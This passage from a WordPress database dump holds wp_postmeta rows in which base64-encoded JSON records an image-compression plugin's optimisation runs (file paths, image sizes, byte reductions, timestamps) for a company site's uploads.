VwbG9hZHNcLzIwMTZcLzA5XC9Qcm90ZWN0aXZlLUNvYXRpbmdzLWUxNDczMzYzMTI1MzA5LTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Byb3RlY3RpdmUtQ29hdGluZ3MtZTE0NzMzNjMxMjUzMDktMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6MzIzLCJ0aW1lIjoxNDgzNTcyNDcyLCJpZCI6MTM3N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Byb3RlY3RpdmUtQ29hdGluZ3MtZTE0NzMzNjMxMjUzMDktMTgweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Byb3RlY3RpdmUtQ29hdGluZ3MtZTE0NzMzNjMxMjUzMDktMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS0xODB4NjguanBnIiwicmVkdWN0aW9uIjoyNjAsInRpbWUiOjE0ODM1NzI0NzQsImlkIjoxMzc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS0yNDd4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS0yNDd4NjguanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Qcm90ZWN0aXZlLUNvYXRpbmdzLWUxNDczMzYzMTI1MzA5LTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI0NzYsImlkIjoxMzc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS0zMDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS0zMDB4NjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Qcm90ZWN0aXZlLUNvYXRpbmdzLWUxNDczMzYzMTI1MzA5LTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI0NzgsImlkIjoxMzc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS00MDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUHJvdGVjdGl2ZS1Db2F0aW5ncy1lMTQ3MzM2MzEyNTMwOS00MDB4NjguanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Qcm90ZWN0aXZlLUNvYXRpbmdzLWUxNDczMzYzMTI1MzA5LTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI0ODAsImlkIjoxMzc3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29575, 1373, 'wpfc_optimisation_reduction', '115169'); 
INSERT INTO `wp_postmeta` VALUES (29576, 1373, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi5qcGciLCJ3aWR0aCI6MjU2MCwiaGVpZ2h0IjoxOTIwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzIuanBnIiwicmVkdWN0aW9uIjoxMTUxNTUsInRpbWUiOjE0ODM1NzI0OTAsImlkIjoiMTM3MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNDkzLCJpZCI6MTM3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi04MDB4NjAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTgwMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzItODAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI0OTYsImlkIjoxMzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTc2OHg1NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItNzY4eDU3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMi03Njh4NTc2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjQ5OSwiaWQiOjEzNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMTYwMHgxMjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMTYwMHgxMjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MyLTE2MDB4MTIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1MDMsImlkIjoxMzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjUwNSwiaWQiOjEzNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTA4LCJpZCI6MTM3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1MTAsImlkIjoxMzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjUxMywiaWQiOjEzNzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1MTUsImlkIjoxMzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTE3LCJpZCI6MTM3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjUyMCwiaWQiOjEzNzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1MjIsImlkIjoxMzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTI0LCJpZCI6MTM3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjUyNywiaWQiOjEzNzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29577, 1372, 'wpfc_optimisation_reduction', '117717'); 
INSERT INTO `wp_postmeta` VALUES (29578, 1372, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoxOTk2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzQuanBnIiwicmVkdWN0aW9uIjoxMTc3MDMsInRpbWUiOjE0ODM1NzI1MzgsImlkIjoiMTM3MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1M0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTQwLCJpZCI6MTM3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzQtODAweDUzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1NDMsImlkIjoxMzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TNC03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjU0NiwiaWQiOjEzNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMTYwMHgxMDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1M0LTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1NTAsImlkIjoxMzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TNC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjU1MywiaWQiOjEzNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1M0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTU1LCJpZCI6MTM3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1NTgsImlkIjoxMzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TNC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4M